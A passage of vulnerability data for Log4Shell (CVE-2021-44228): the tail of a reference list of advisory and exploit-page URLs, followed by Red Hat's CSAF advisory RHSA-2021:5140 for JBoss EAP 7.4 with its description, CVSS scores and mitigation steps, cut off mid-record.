Entry\"]},{\"url\":\"http://packetstormsecurity.com/files/165311/log4j-scan-Extensive-Scanner.html\",\"source\":\"security@apache.org\",\"tags\":[\"Third Party Advisory\",\"VDB Entry\"]},{\"url\":\"http://packetstormsecurity.com/files/165371/VMware-Security-Advisory-2021-0028.4.html\",\"source\":\"security@apache.org\",\"tags\":[\"Exploit\",\"Third Party Advisory\",\"VDB Entry\"]},{\"url\":\"http://packetstormsecurity.com/files/165532/Log4Shell-HTTP-Header-Injection.html\",\"source\":\"security@apache.org\",\"tags\":[\"Exploit\",\"Third Party Advisory\",\"VDB Entry\"]},{\"url\":\"http://packetstormsecurity.com/files/165642/VMware-vCenter-Server-Unauthenticated-Log4Shell-JNDI-Injection-Remote-Code-Execution.html\",\"source\":\"security@apache.org\",\"tags\":[\"Exploit\",\"Third Party Advisory\",\"VDB Entry\"]},{\"url\":\"http://packetstormsecurity.com/files/165673/UniFi-Network-Application-Unauthenticated-Log4Shell-Remote-Code-Execution.html\",\"source\":\"security@apache.org\",\"tags\":[\"Exploit\",\"Third Party Advisory\",\"VDB Entry\"]},{\"url\":\"http://packetstormsecurity.com/files/167794/Open-Xchange-App-Suite-7.10.x-Cross-Site-Scripting-Command-Injection.html\",\"source\":\"security@apache.org\",\"tags\":[\"Third Party Advisory\",\"VDB Entry\"]},{\"url\":\"http://packetstormsecurity.com/files/167917/MobileIron-Log4Shell-Remote-Command-Execution.html\",\"source\":\"security@apache.org\",\"tags\":[\"Exploit\",\"Third Party Advisory\",\"VDB Entry\"]},{\"url\":\"http://packetstormsecurity.com/files/171626/AD-Manager-Plus-7122-Remote-Code-Execution.html\",\"source\":\"security@apache.org\",\"tags\":[\"Third Party Advisory\",\"VDB Entry\"]},{\"url\":\"http://seclists.org/fulldisclosure/2022/Dec/2\",\"source\":\"security@apache.org\",\"tags\":[\"Exploit\",\"Mailing List\",\"Third Party Advisory\"]},{\"url\":\"http://seclists.org/fulldisclosure/2022/Jul/11\",\"source\":\"security@apache.org\",\"tags\":[\"Mailing List\",\"Third Party Advisory\"]},{\"url\":\"http://seclists.org/fulldisclosure/2022/Mar/23\",\"source\":\"security@apache.org\",\"tags\":[\"Mailing List\",\"Third Party Advisory\"]},{\"url\":\"http://www.openwall.com/lists/oss-security/2021/12/10/1\",\"source\":\"security@apache.org\",\"tags\":[\"Mailing List\",\"Mitigation\",\"Third Party Advisory\"]},{\"url\":\"http://www.openwall.com/lists/oss-security/2021/12/10/2\",\"source\":\"security@apache.org\",\"tags\":[\"Mailing List\",\"Mitigation\",\"Third Party Advisory\"]},{\"url\":\"http://www.openwall.com/lists/oss-security/2021/12/10/3\",\"source\":\"security@apache.org\",\"tags\":[\"Mailing List\",\"Third Party Advisory\"]},{\"url\":\"http://www.openwall.com/lists/oss-security/2021/12/13/1\",\"source\":\"security@apache.org\",\"tags\":[\"Mailing List\",\"Third Party Advisory\"]},{\"url\":\"http://www.openwall.com/lists/oss-security/2021/12/13/2\",\"source\":\"security@apache.org\",\"tags\":[\"Mailing List\",\"Third Party Advisory\"]},{\"url\":\"http://www.openwall.com/lists/oss-security/2021/12/14/4\",\"source\":\"security@apache.org\",\"tags\":[\"Mailing List\",\"Third Party Advisory\"]},{\"url\":\"http://www.openwall.com/lists/oss-security/2021/12/15/3\",\"source\":\"security@apache.org\",\"tags\":[\"Mailing List\",\"Third Party Advisory\"]},{\"url\":\"https://cert-portal.siemens.com/productcert/pdf/ssa-397453.pdf\",\"source\":\"security@apache.org\",\"tags\":[\"Third Party Advisory\"]},{\"url\":\"https://cert-portal.siemens.com/productcert/pdf/ssa-479842.pdf\",\"source\":\"security@apache.org\",\"tags\":[\"Third Party Advisory\"]},{\"url\":\"https://cert-portal.siemens.com/productcert/pdf/ssa-661247.pdf\",\"source\":\"security@apache.org\",\"tags\":[\"Third Party Advisory\"]},{\"url\":\"https://cert-portal.siemens.com/productcert/pdf/ssa-714170.pdf\",\"source\":\"security@apache.org\",\"tags\":[\"Third Party Advisory\"]},{\"url\":\"https://github.com/cisagov/log4j-affected-db\",\"source\":\"security@apache.org\",\"tags\":[\"Third Party Advisory\"]},{\"url\":\"https://github.com/cisagov/log4j-affected-db/blob/develop/SOFTWARE-LIST.md\",\"source\":\"security@apache.org\",\"tags\":[\"Broken Link\",\"Product\",\"US Government Resource\"]},{\"url\":\"https://github.com/nu11secur1ty/CVE-mitre/tree/main/CVE-2021-44228\",\"source\":\"security@apache.org\",\"tags\":[\"Exploit\",\"Third Party Advisory\"]},{\"url\":\"https://lists.debian.org/debian-lts-announce/2021/12/msg00007.html\",\"source\":\"security@apache.org\",\"tags\":[\"Mailing List\",\"Third Party Advisory\"]},{\"url\":\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/M5CSVUNV4HWZZXGOKNSK6L7RPM7BOKIB/\",\"source\":\"security@apache.org\",\"tags\":[\"Release Notes\"]},{\"url\":\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/VU57UJDCFIASIO35GC55JMKSRXJMCDFM/\",\"source\":\"security@apache.org\",\"tags\":[\"Release Notes\"]},{\"url\":\"https://logging.apache.org/log4j/2.x/security.html\",\"source\":\"security@apache.org\",\"tags\":[\"Release Notes\",\"Vendor Advisory\"]},{\"url\":\"https://msrc-blog.microsoft.com/2021/12/11/microsofts-response-to-cve-2021-44228-apache-log4j2/\",\"source\":\"security@apache.org\",\"tags\":[\"Patch\",\"Third Party Advisory\",\"Vendor Advisory\"]},{\"url\":\"https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0032\",\"source\":\"security@apache.org\",\"tags\":[\"Third Party Advisory\"]},{\"url\":\"https://security.netapp.com/advisory/ntap-20211210-0007/\",\"source\":\"security@apache.org\",\"tags\":[\"Third Party Advisory\"]},{\"url\":\"https://support.apple.com/kb/HT213189\",\"source\":\"security@apache.org\",\"tags\":[\"Third Party Advisory\"]},{\"url\":\"https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-apache-log4j-qRuKNEbd\",\"source\":\"security@apache.org\",\"tags\":[\"Third Party Advisory\"]},{\"url\":\"https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-apache-log4j-qRuKNEbd\",\"source\":\"security@apache.org\",\"tags\":[\"Third Party Advisory\"]},{\"url\":\"https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-apache-log4j-qRuKNEbd\",\"source\":\"security@apache.org\",\"tags\":[\"Third Party Advisory\"]},{\"url\":\"https://twitter.com/kurtseifried/status/1469345530182455296\",\"source\":\"security@apache.org\",\"tags\":[\"Broken Link\",\"Exploit\",\"Third Party Advisory\"]},{\"url\":\"https://www.bentley.com/en/common-vulnerability-exposure/be-2022-0001\",\"source\":\"security@apache.org\",\"tags\":[\"Third Party Advisory\"]},{\"url\":\"https://www.debian.org/security/2021/dsa-5020\",\"source\":\"security@apache.org\",\"tags\":[\"Mailing List\",\"Third Party Advisory\"]},{\"url\":\"https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00646.html\",\"source\":\"security@apache.org\",\"tags\":[\"Third Party Advisory\"]},{\"url\":\"https://www.kb.cert.org/vuls/id/930724\",\"source\":\"security@apache.org\",\"tags\":[\"Third Party Advisory\",\"US Government Resource\"]},{\"url\":\"https://www.nu11secur1ty.com/2021/12/cve-2021-44228.html\",\"source\":\"security@apache.org\",\"tags\":[\"Exploit\",\"Third Party Advisory\"]},{\"url\":\"https://www.oracle.com/security-alerts/alert-cve-2021-44228.html\",\"source\":\"security@apache.org\",\"tags\":[\"Third Party Advisory\"]},{\"url\":\"https://www.oracle.com/security-alerts/cpuapr2022.html\",\"source\":\"security@apache.org\",\"tags\":[\"Patch\",\"Third Party Advisory\"]},{\"url\":\"https://www.oracle.com/security-alerts/cpujan2022.html\",\"source\":\"security@apache.org\",\"tags\":[\"Patch\",\"Third Party Advisory\"]},{\"url\":\"http://packetstormsecurity.com/files/165225/Apache-Log4j2-2.14.1-Remote-Code-Execution.html\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Third Party Advisory\",\"VDB Entry\"]},{\"url\":\"http://packetstormsecurity.com/files/165260/VMware-Security-Advisory-2021-0028.html\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Third Party Advisory\",\"VDB Entry\"]},{\"url\":\"http://packetstormsecurity.com/files/165261/Apache-Log4j2-2.14.1-Information-Disclosure.html\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Exploit\",\"Third Party Advisory\",\"VDB Entry\"]},{\"url\":\"http://packetstormsecurity.com/files/165270/Apache-Log4j2-2.14.1-Remote-Code-Execution.html\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Exploit\",\"Third Party Advisory\",\"VDB Entry\"]},{\"url\":\"http://packetstormsecurity.com/files/165281/Log4j2-Log4Shell-Regexes.html\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Third Party Advisory\",\"VDB Entry\"]},{\"url\":\"http://packetstormsecurity.com/files/165282/Log4j-Payload-Generator.html\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Third Party Advisory\",\"VDB Entry\"]},{\"url\":\"http://packetstormsecurity.com/files/165306/L4sh-Log4j-Remote-Code-Execution.html\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Third Party Advisory\",\"VDB Entry\"]},{\"url\":\"http://packetstormsecurity.com/files/165307/Log4j-Remote-Code-Execution-Word-Bypassing.html\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Third Party Advisory\",\"VDB Entry\"]},{\"url\":\"http://packetstormsecurity.com/files/165311/log4j-scan-Extensive-Scanner.html\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Third Party Advisory\",\"VDB Entry\"]},{\"url\":\"http://packetstormsecurity.com/files/165371/VMware-Security-Advisory-2021-0028.4.html\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Exploit\",\"Third Party Advisory\",\"VDB Entry\"]},{\"url\":\"http://packetstormsecurity.com/files/165532/Log4Shell-HTTP-Header-Injection.html\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Exploit\",\"Third Party Advisory\",\"VDB Entry\"]},{\"url\":\"http://packetstormsecurity.com/files/165642/VMware-vCenter-Server-Unauthenticated-Log4Shell-JNDI-Injection-Remote-Code-Execution.html\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Exploit\",\"Third Party Advisory\",\"VDB Entry\"]},{\"url\":\"http://packetstormsecurity.com/files/165673/UniFi-Network-Application-Unauthenticated-Log4Shell-Remote-Code-Execution.html\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Exploit\",\"Third Party Advisory\",\"VDB Entry\"]},{\"url\":\"http://packetstormsecurity.com/files/167794/Open-Xchange-App-Suite-7.10.x-Cross-Site-Scripting-Command-Injection.html\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Third Party Advisory\",\"VDB Entry\"]},{\"url\":\"http://packetstormsecurity.com/files/167917/MobileIron-Log4Shell-Remote-Command-Execution.html\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Exploit\",\"Third Party Advisory\",\"VDB Entry\"]},{\"url\":\"http://packetstormsecurity.com/files/171626/AD-Manager-Plus-7122-Remote-Code-Execution.html\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Third Party Advisory\",\"VDB Entry\"]},{\"url\":\"http://seclists.org/fulldisclosure/2022/Dec/2\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Exploit\",\"Mailing List\",\"Third Party Advisory\"]},{\"url\":\"http://seclists.org/fulldisclosure/2022/Jul/11\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Mailing List\",\"Third Party Advisory\"]},{\"url\":\"http://seclists.org/fulldisclosure/2022/Mar/23\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Mailing List\",\"Third Party Advisory\"]},{\"url\":\"http://www.openwall.com/lists/oss-security/2021/12/10/1\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Mailing List\",\"Mitigation\",\"Third Party Advisory\"]},{\"url\":\"http://www.openwall.com/lists/oss-security/2021/12/10/2\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Mailing List\",\"Mitigation\",\"Third Party Advisory\"]},{\"url\":\"http://www.openwall.com/lists/oss-security/2021/12/10/3\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Mailing List\",\"Third Party Advisory\"]},{\"url\":\"http://www.openwall.com/lists/oss-security/2021/12/13/1\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Mailing List\",\"Third Party Advisory\"]},{\"url\":\"http://www.openwall.com/lists/oss-security/2021/12/13/2\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Mailing List\",\"Third Party Advisory\"]},{\"url\":\"http://www.openwall.com/lists/oss-security/2021/12/14/4\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Mailing List\",\"Third Party Advisory\"]},{\"url\":\"http://www.openwall.com/lists/oss-security/2021/12/15/3\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Mailing List\",\"Third Party Advisory\"]},{\"url\":\"https://cert-portal.siemens.com/productcert/pdf/ssa-397453.pdf\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Third Party Advisory\"]},{\"url\":\"https://cert-portal.siemens.com/productcert/pdf/ssa-479842.pdf\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Third Party Advisory\"]},{\"url\":\"https://cert-portal.siemens.com/productcert/pdf/ssa-661247.pdf\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Third Party Advisory\"]},{\"url\":\"https://cert-portal.siemens.com/productcert/pdf/ssa-714170.pdf\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Third Party Advisory\"]},{\"url\":\"https://github.com/cisagov/log4j-affected-db\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Third Party Advisory\"]},{\"url\":\"https://github.com/cisagov/log4j-affected-db/blob/develop/SOFTWARE-LIST.md\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Broken Link\",\"Product\",\"US Government Resource\"]},{\"url\":\"https://github.com/nu11secur1ty/CVE-mitre/tree/main/CVE-2021-44228\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Exploit\",\"Third Party Advisory\"]},{\"url\":\"https://lists.debian.org/debian-lts-announce/2021/12/msg00007.html\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Mailing List\",\"Third Party Advisory\"]},{\"url\":\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/M5CSVUNV4HWZZXGOKNSK6L7RPM7BOKIB/\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Release Notes\"]},{\"url\":\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/VU57UJDCFIASIO35GC55JMKSRXJMCDFM/\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Release Notes\"]},{\"url\":\"https://logging.apache.org/log4j/2.x/security.html\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Release Notes\",\"Vendor Advisory\"]},{\"url\":\"https://msrc-blog.microsoft.com/2021/12/11/microsofts-response-to-cve-2021-44228-apache-log4j2/\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Patch\",\"Third Party Advisory\",\"Vendor Advisory\"]},{\"url\":\"https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0032\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Third Party Advisory\"]},{\"url\":\"https://security.netapp.com/advisory/ntap-20211210-0007/\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Third Party Advisory\"]},{\"url\":\"https://support.apple.com/kb/HT213189\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Third Party Advisory\"]},{\"url\":\"https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-apache-log4j-qRuKNEbd\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Third Party Advisory\"]},{\"url\":\"https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-apache-log4j-qRuKNEbd\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Third Party Advisory\"]},{\"url\":\"https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-apache-log4j-qRuKNEbd\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Third Party Advisory\"]},{\"url\":\"https://twitter.com/kurtseifried/status/1469345530182455296\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Broken Link\",\"Exploit\",\"Third Party Advisory\"]},{\"url\":\"https://www.bentley.com/en/common-vulnerability-exposure/be-2022-0001\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Third Party Advisory\"]},{\"url\":\"https://www.debian.org/security/2021/dsa-5020\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Mailing List\",\"Third Party Advisory\"]},{\"url\":\"https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00646.html\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Third Party Advisory\"]},{\"url\":\"https://www.kb.cert.org/vuls/id/930724\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Third Party Advisory\",\"US Government Resource\"]},{\"url\":\"https://www.nu11secur1ty.com/2021/12/cve-2021-44228.html\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Exploit\",\"Third Party Advisory\"]},{\"url\":\"https://www.oracle.com/security-alerts/alert-cve-2021-44228.html\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Third Party Advisory\"]},{\"url\":\"https://www.oracle.com/security-alerts/cpuapr2022.html\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Patch\",\"Third Party Advisory\"]},{\"url\":\"https://www.oracle.com/security-alerts/cpujan2022.html\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Patch\",\"Third Party Advisory\"]}]}}"
}
}
rhsa-2021_5140
Vulnerability from csaf_redhat
Published
2021-12-15 02:59
Modified
2024-12-12 01:19
Summary
Red Hat Security Advisory: Red Hat JBoss Enterprise Application Platform 7.4 security update
Notes
Topic
A security update is now available for Red Hat JBoss Enterprise Application Platform 7.4.
Red Hat Product Security has rated this update as having a security impact of Low. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.
Details
Red Hat JBoss Enterprise Application Platform 7 is a platform for Java applications based on the WildFly application runtime.
This asynchronous patch is a security update for Red Hat JBoss Enterprise Application Platform 7.4.
Security Fix(es):
* log4j-core: Remote code execution in Log4j 2.x when logs contain an attacker-controlled string value (CVE-2021-44228)
For more details about the security issue(s), including the impact, a CVSS score, and other related information, see the CVE page(s) listed in the References section.
Terms of Use
This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.
{
"document": {
"aggregate_severity": {
"namespace": "https://access.redhat.com/security/updates/classification/",
"text": "Low"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright \u00a9 Red Hat, Inc. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "A security update is now available for Red Hat JBoss Enterprise Application Platform 7.4.\n\nRed Hat Product Security has rated this update as having a security impact of Low. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.",
"title": "Topic"
},
{
"category": "general",
"text": "Red Hat JBoss Enterprise Application Platform 7 is a platform for Java applications based on the WildFly application runtime.\n\nThis asynchronous patch is a security update for Red Hat JBoss Enterprise Application Platform 7.4.\n\nSecurity Fix(es):\n\n* log4j-core: Remote code execution in Log4j 2.x when logs contain an attacker-controlled string value (CVE-2021-44228)\n\nFor more details about the security issue(s), including the impact, a CVSS score, and other related information, see the CVE page(s) listed in the References section.",
"title": "Details"
},
{
"category": "legal_disclaimer",
"text": "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.",
"title": "Terms of Use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://access.redhat.com/security/team/contact/",
"issuing_authority": "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.",
"name": "Red Hat Product Security",
"namespace": "https://www.redhat.com"
},
"references": [
{
"category": "self",
"summary": "https://access.redhat.com/errata/RHSA-2021:5140",
"url": "https://access.redhat.com/errata/RHSA-2021:5140"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/updates/classification/#low",
"url": "https://access.redhat.com/security/updates/classification/#low"
},
{
"category": "external",
"summary": "https://access.redhat.com/jbossnetwork/restricted/listSoftware.html?downloadType=securityPatches\u0026product=appplatform\u0026version=7.4",
"url": "https://access.redhat.com/jbossnetwork/restricted/listSoftware.html?downloadType=securityPatches\u0026product=appplatform\u0026version=7.4"
},
{
"category": "external",
"summary": "https://access.redhat.com/solutions/6577421",
"url": "https://access.redhat.com/solutions/6577421"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/vulnerabilities/RHSB-2021-009",
"url": "https://access.redhat.com/security/vulnerabilities/RHSB-2021-009"
},
{
"category": "external",
"summary": "https://access.redhat.com/documentation/en-us/red_hat_jboss_enterprise_application_platform/7.4/",
"url": "https://access.redhat.com/documentation/en-us/red_hat_jboss_enterprise_application_platform/7.4/"
},
{
"category": "external",
"summary": "https://access.redhat.com/documentation/en-us/red_hat_jboss_enterprise_application_platform/7.4/html-single/installation_guide/",
"url": "https://access.redhat.com/documentation/en-us/red_hat_jboss_enterprise_application_platform/7.4/html-single/installation_guide/"
},
{
"category": "external",
"summary": "2030932",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2030932"
},
{
"category": "self",
"summary": "Canonical URL",
"url": "https://security.access.redhat.com/data/csaf/v2/advisories/2021/rhsa-2021_5140.json"
}
],
"title": "Red Hat Security Advisory: Red Hat JBoss Enterprise Application Platform 7.4 security update",
"tracking": {
"current_release_date": "2024-12-12T01:19:00+00:00",
"generator": {
"date": "2024-12-12T01:19:00+00:00",
"engine": {
"name": "Red Hat SDEngine",
"version": "4.2.3"
}
},
"id": "RHSA-2021:5140",
"initial_release_date": "2021-12-15T02:59:53+00:00",
"revision_history": [
{
"date": "2021-12-15T02:59:53+00:00",
"number": "1",
"summary": "Initial version"
},
{
"date": "2021-12-15T02:59:53+00:00",
"number": "2",
"summary": "Last updated version"
},
{
"date": "2024-12-12T01:19:00+00:00",
"number": "3",
"summary": "Last generated version"
}
],
"status": "final",
"version": "3"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_name",
"name": "EAP 7.4 log4j async",
"product": {
"name": "EAP 7.4 log4j async",
"product_id": "EAP 7.4 log4j async",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:jboss_enterprise_application_platform:7.4"
}
}
}
],
"category": "product_family",
"name": "Red Hat JBoss Enterprise Application Platform"
}
],
"category": "vendor",
"name": "Red Hat"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2021-44228",
"cwe": {
"id": "CWE-20",
"name": "Improper Input Validation"
},
"discovery_date": "2021-12-10T00:00:00+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2030932"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in the Apache Log4j logging library in versions from 2.0.0 and before 2.15.0. A remote attacker who can control log messages or log message parameters, can execute arbitrary code on the server via JNDI LDAP endpoint.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "log4j-core: Remote code execution in Log4j 2.x when logs contain an attacker-controlled string value",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This issue only affects log4j versions between 2.0 and 2.14.1. In order to exploit this flaw you need:\n- A remotely accessible endpoint with any protocol (HTTP, TCP, etc) that allows an attacker to send arbitrary data,\n- A log statement in the endpoint that logs the attacker controlled data.\n\nIn Red Hat OpenShift Logging the vulnerable log4j library is shipped in the Elasticsearch components. Because Elasticsearch is not susceptible to remote code execution with this vulnerability due to use of the Java Security Manager and because access to these components is limited, the impact by this vulnerability is reduced to Moderate.\n\nAs per upstream applications using Log4j 1.x may be impacted by this flaw if their configuration uses JNDI. However, the risk is much lower. This flaw in Log4j 1.x is tracked via https://access.redhat.com/security/cve/CVE-2021-4104 and has been rated as having Moderate security impact.\n\nCodeReady Studio version 12.21.1 was released containing a fix for this vulnerability.\n\nThe following products are NOT affected by this flaw and have been explicitly listed here for the benefit of our customers.\n- Red Hat Enterprise Linux\n- Red Hat Advanced Cluster Management for Kubernetes \n- Red Hat Advanced Cluster Security for Kubernetes\n- Red Hat Ansible Automation Platform (Engine and Tower)\n- Red Hat Certificate System\n- Red Hat Directory Server\n- Red Hat Identity Management\n- Red Hat CloudForms \n- Red Hat Update Infrastructure\n- Red Hat Satellite\n- Red Hat Ceph Storage\n- Red Hat Gluster Storage\n- Red Hat OpenShift Data Foundation\n- Red Hat OpenStack Platform\n- Red Hat Virtualization\n- Red Hat Single Sign-On\n- Red Hat 3scale API Management",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"EAP 7.4 log4j async"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2021-44228"
},
{
"category": "external",
"summary": "RHBZ#2030932",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2030932"
},
{
"category": "external",
"summary": "RHSB-2021-009",
"url": "https://access.redhat.com/security/vulnerabilities/RHSB-2021-009"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2021-44228",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-44228"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2021-44228",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2021-44228"
},
{
"category": "external",
"summary": "https://github.com/advisories/GHSA-jfh8-c2jp-5v3q",
"url": "https://github.com/advisories/GHSA-jfh8-c2jp-5v3q"
},
{
"category": "external",
"summary": "https://logging.apache.org/log4j/2.x/security.html",
"url": "https://logging.apache.org/log4j/2.x/security.html"
},
{
"category": "external",
"summary": "https://www.lunasec.io/docs/blog/log4j-zero-day/",
"url": "https://www.lunasec.io/docs/blog/log4j-zero-day/"
},
{
"category": "external",
"summary": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog",
"url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog"
}
],
"release_date": "2021-12-10T02:01:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2021-12-15T02:59:53+00:00",
"details": "Before applying this update, back up your existing Red Hat JBoss Enterprise Application Platform installation and deployed applications.\n\nThe References section of this erratum contains a download link (you must log in to download the update).",
"product_ids": [
"EAP 7.4 log4j async"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2021:5140"
},
{
"category": "workaround",
"details": "For Log4j versions \u003e=2.10\nset the system property log4j2.formatMsgNoLookups or the environment variable LOG4J_FORMAT_MSG_NO_LOOKUPS to true\n\nFor Log4j versions \u003e=2.7 and \u003c=2.14.1\nall PatternLayout patterns can be modified to specify the message converter as %m{nolookups} instead of just %m\n\nFor Log4j versions \u003e=2.0-beta9 and \u003c=2.10.0\nremove the JndiLookup class from the classpath. For example: \n```\nzip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class\n```\n\nOn OpenShift 4 and in OpenShift Logging, the above mitigation can be applied by following the steps in this article: https://access.redhat.com/solutions/6578421\n\nOn OpenShift 3.11, mitigation to the affected Elasticsearch component can be applied by following the steps in this article: https://access.redhat.com/solutions/6578441",
"product_ids": [
"EAP 7.4 log4j async"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"EAP 7.4 log4j async"
]
}
],
"threats": [
{
"category": "exploit_status",
"date": "2021-12-10T00:00:00+00:00",
"details": "CISA: https://www.cisa.gov/known-exploited-vulnerabilities-catalog"
},
{
"category": "impact",
